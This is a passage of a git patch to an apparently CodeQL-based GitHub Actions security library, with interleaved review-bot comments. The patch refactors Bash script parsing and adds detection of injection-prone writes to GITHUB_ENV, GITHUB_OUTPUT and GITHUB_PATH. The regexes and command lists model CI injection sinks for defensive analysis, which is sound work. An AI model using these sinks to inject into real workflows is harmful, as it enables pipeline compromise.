restoredQuotedStringLineProducer(int i) { + private string restoredStmtQuotedStringLineProducer(int i) { result = - max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) } - private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { round = 0 and - old = this.restoredQuotedStringLineProducer(line) and + old = this.restoredStmtQuotedStringLineProducer(line) and new = old or round 
> 0 and exists(string middle, string target, string replacement | - this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and this.rankedCmdSubstitutionReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) @@ -1479,7 +1483,7 @@ class RunImpl extends StepImpl { string getStmt(int i) { result = max(int round, string new | - this.doRestoreCmdSubstitutions(i, round, _, new) + this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round ) 
@@ -1487,18 +1491,63 @@ class RunImpl extends StepImpl { string getAStmt() { result = this.getStmt(_) } - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) ) } - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, 
round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } string getCommand(int i) { - result = this.getStmt(i) and + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords not result = [ @@ -1509,6 +1558,16 @@ class RunImpl extends StepImpl { string getACommand() { result = this.getCommand(_) } + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + predicate getAWriteToGitHubEnv(string name, string value) { exists(string raw | Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index a0755f3582dc..5e8731010cac 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getACommand().regexpFind(regexp, _, _)) + this.getACommand().regexpMatch("^" + regexp + ".*") ) } } From be87eccbe729abbbda912d476c586b3ffc2ca88b Mon Sep 17 00:00:00 2001 
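Review bot: The comment copied into the new `cmdProducer` has a typo, `we only one the split parts`, which should read `we only want the split parts`. Beyond that, `doCmdRestoreQuotedStrings`, `restoredCmdQuotedStringLineProducer` and `doCmdRestoreCmdSubstitutions` are line-for-line copies of their `Stmt` counterparts differing only in the seed producer; a parameterised restore chain over the producer (or at least a comment pointing at the twin so both are edited together) would avoid the two diverging, which matters because `getCommand` now feeds the poisonable-step and file-write detections. The `getCommand` hunk that follows moves `getAssignment`/`getAnAssignment` without change and needs no review.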
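Review bot: `regexpMatch("^" + regexp + ".*")` anchors only the first alternative when a pattern from `poisonableCommandsDataModel` contains a top-level `|`, so `^a|b.*` would still match `b` anywhere in the command; wrap the pattern in a non-capturing group, `this.getACommand().regexpMatch("^(?:" + regexp + ").*")`. Anchoring at the start of the command also means a poisonable command preceded by a wrapper such as `sudo`, `time` or `env VAR=x` is no longer detected, where the previous `regexpFind` would have caught it; whether the data model's patterns already allow for a leading wrapper is not visible here, so this is worth a test case either way.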
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:04:20 +0200 Subject: [PATCH 581/707] Refactor Script support --- ql/lib/codeql/actions/Ast.qll | 48 ++- ql/lib/codeql/actions/Bash.qll | 398 +++++++++++++++--- ql/lib/codeql/actions/Helper.qll | 1 + ql/lib/codeql/actions/PowerShell.qll | 50 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 374 +++++----------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../codeql/actions/dataflow/FlowSources.qll | 20 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 6 +- .../security/ArgumentInjectionQuery.qll | 20 +- .../security/ArtifactPoisoningQuery.qll | 60 ++- .../actions/security/CodeInjectionQuery.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 4 +- .../security/EnvPathInjectionQuery.qll | 29 +- .../actions/security/EnvVarInjectionQuery.qll | 29 +- .../security/OutputClobberingQuery.qll | 117 +++-- .../actions/security/PoisonableSteps.qll | 13 +- .../security/UntrustedCheckoutQuery.qll | 16 +- .../.github/workflows/commands.yml | 20 +- ql/test/library-tests/commands.expected | 34 +- ql/test/library-tests/commands.ql | 2 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.expected | 1 + .../CWE-074/.github/workflows/output1.yml | 1 + .../actions/download-artifact-2/action.yaml | 32 ++ .../actions/download-artifact/action.yaml | 32 ++ .../.github/workflows/artifactpoisoning51.yml | 20 + .../.github/workflows/artifactpoisoning52.yml | 26 ++ .../.github/workflows/artifactpoisoning53.yml | 27 ++ .../.github/workflows/artifactpoisoning91.yml | 29 ++ .../.github/workflows/artifactpoisoning92.yml | 29 ++ .../CWE-077/EnvVarInjectionCritical.expected | 20 + .../CWE-077/EnvVarInjectionMedium.expected | 15 + .../ArtifactPoisoningCritical.expected | 12 - .../CWE-829/ArtifactPoisoningMedium.expected | 9 - 35 files changed, 1001 insertions(+), 519 deletions(-) create mode 100644 ql/lib/codeql/actions/PowerShell.qll create mode 
100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cc29ceffe53b..620f74e25bb8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,6 +22,10 @@ class AstNode instanceof AstNodeImpl { CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } } class ScalarValue extends AstNode instanceof ScalarValueImpl { @@ -121,6 +125,10 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { class Input extends AstNode instanceof InputImpl { } +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + class Outputs extends AstNode instanceof OutputsImpl { Expression getAnOutputExpr() { result = super.getAnOutputExpr() } 
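Review bot: The new wrapper is named `Default` but wraps `DefaultsImpl`, whereas every other class in this file keeps the implementation name minus `Impl` (`Input`/`InputImpl`, `Outputs`/`OutputsImpl`); `class Defaults extends AstNode instanceof DefaultsImpl` would follow that convention and match the `defaults:` key it presumably models. A QLDoc for `getValue(string name, string prop)` would also help, since neither `name` nor `prop` is self-explanatory in the signature.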
@@ -286,14 +294,18 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step instanceof RunImpl { - string getScript() { result = super.getScript() } - - ScalarValue getScriptScalar() { result = super.getScriptScalar() } + ShellScript getScript() { result = super.getScript() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + string getStmt(int i) { result = super.getStmt(i) } string getAStmt() { result = super.getAStmt() } 
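Review bot: `class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl` exposes the internal implementation class in the public AST API, while every other class in this file extends the public wrapper and only names the Impl in the `instanceof` (for example `class ScalarValue extends AstNode instanceof ScalarValueImpl`); `class ShellScript extends ScalarValue instanceof ShellScriptImpl` would keep the public/internal split intact. The change also removes `Run.getScriptScalar()`, which `FlowSteps.qll` called in the previous commit; the diffstat lists that file as updated, so this is only a reminder that external queries using it will break. The `ShellScript` class body continues past this hunk.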
@@ -302,19 +314,23 @@ class Run extends Step instanceof RunImpl { string getACommand() { result = super.getACommand() } - predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } - predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + string getAFileReadCommand() { result = super.getAFileReadCommand() } - predicate getAWriteToGitHubEnv(string name, string value) { - super.getAWriteToGitHubEnv(name, value) + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) } - predicate getAWriteToGitHubOutput(string name, string value) { - super.getAWriteToGitHubOutput(name, value) + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) } - predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { super.getAnEnvReachingGitHubOutputWrite(var, output_field) 
@@ -331,6 +347,18 @@ class Run extends Step instanceof RunImpl { predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { super.getACmdReachingGitHubEnvWrite(cmd, output_field) } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fc9a75319ebf..541ab437db2b 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll 
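Review bot: The five new public predicates on `Run` (`getAnEnvReachingGitHubPathWrite` through `fileToGitHubPath`) have no QLDoc, and the parameter name `path` in `fileToGitHubEnv(string path)` is ambiguous between the file being read and the `GITHUB_ENV` file being written. A one-line QLDoc per predicate would settle it, for instance `/** Holds if the script writes the contents of the file at `path` into `$GITHUB_ENV`. */` — presumably that is the semantics, but the implementation is in the internal `Ast.qll` and not visible in this hunk, so the wording should be checked against it.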
@@ -1,7 +1,303 @@ private import codeql.actions.Ast -private import codeql.Locations -import codeql.actions.config.Config -private import codeql.actions.security.ControlChecks + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("bash%") + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new 
order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int 
line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, 
target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + 
Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} module Bash { string stmtSeparator() { result = ";" } 
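Review bot: The characteristic predicate of `BashShellScript` at the top of the hunk only admits `run.getShell().matches("bash%")`, so a step with `shell: sh` (a valid GitHub Actions value using the same `$(...)`, quoting and `>> $GITHUB_ENV` syntax this parser handles) or `shell: /bin/bash` belongs to no `ShellScriptImpl` subclass, and every `getAWriteToGitHub*` / `*Reaching*` / `fileToGitHub*` predicate is silently empty for it — a detection gap, not an error. Nothing in the line/statement splitting here relies on bash-only syntax, so `run.getShell().matches(["bash%", "sh%"])` (or a regex on the basename of the shell string) would close most of that gap. A comment on the constructor stating which `shell:` values are covered would make the remaining gap visible to whoever triages missing results.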
@@ -23,7 +319,7 @@ module Bash { result = pipeSeparator() } - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ bindingset[expr] @@ -133,8 +429,7 @@ module Bash { string script, string cmd, string file, string content, string filters ) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and @@ -145,13 +440,12 @@ module Bash { bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) 
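Review bot: `fileReadCommand()` now bundles `<` with the word commands `cat`, `jq`, `yq`, `tail`, `head`, and its consumer in this diff (`BashShellScript.getFileReadCommand`) matches it as `fileReadCommand() + "%"`, so a statement such as `catalog build ...` or `header-check ...` is classified as a file read; the deleted `outputsPartialFileContent` required a trailing space after the word commands and handled `<` separately. Keeping the word boundary, e.g. `result.matches(["<%", Bash::fileReadCommand() + " %"])` in the consumer (or returning `"cat "`, `"jq "`, … plus `"<"` from here), restores the old precision. The `(?i)` flag on the two `echo|printf` regexes below was presumably there for `write-output`; with that alternative gone it only makes `ECHO`/`Printf` match, which is harmless but worth a second look.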
@@ -262,57 +556,38 @@ module Bash { } /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - predicate fileToFileWrite(Run run, string file_var, string path) { + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { exists(string regexp, string stmt, string file_expr | regexp = "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - stmt = run.getAStmt() and + stmt = script.getAStmt() and file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and path = stmt.regexpCapture(regexp, 2) and containsParameterExpansion(file_expr, file_var, _, _) ) } - predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } - - predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } - - predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. 
- // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } - /** * Holds if the Run scripts contains an access to an environment variable called `var` * which value may get appended to the GITHUB_XXX special file */ - predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - envReachingRunExpr(run, var, file_write_value) + envReachingRunExpr(script, var, file_write_value) ) } @@ -321,11 +596,11 @@ module Bash { * Where the expression is a string captured from the Run's script. */ bindingset[expr] - predicate envReachingRunExpr(Run run, string var, string expr) { + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { exists(string var2, string value2 | // VAR2=${VAR:-default} (var2=value2) // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and + script.getAnAssignment(var2, value2) and containsParameterExpansion(value2, var, _, _) and containsParameterExpansion(expr, var2, _, _) ) 
@@ -339,33 +614,42 @@ module Bash { * Holds if the Run scripts contains a command substitution (`cmd`) * which output may get appended to the GITHUB_XXX special file */ - predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - ( - // cmd output is assigned to a second variable (var2) and var2 reaches the file write - exists(string var2, string value2 | - // VAR2=$(cmd) - // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and - containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(file_write_value, var2, _, _) - ) - or - // var reaches the file write directly - // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) - containsCmdSubstitution(file_write_value, cmd) - ) + cmdReachingRunExpr(script, cmd, file_write_value) + ) + } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. 
+ */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) } } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index ae4405a185bd..fb6fdf2d74b8 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -3,6 +3,7 @@ private import codeql.Locations private import codeql.actions.security.ControlChecks import codeql.actions.config.Config import codeql.actions.Bash +import codeql.actions.PowerShell bindingset[expr] string normalizeExpr(string expr) { diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll new file mode 100644 index 000000000000..1727930c2a3f --- /dev/null +++ b/ql/lib/codeql/actions/PowerShell.qll 
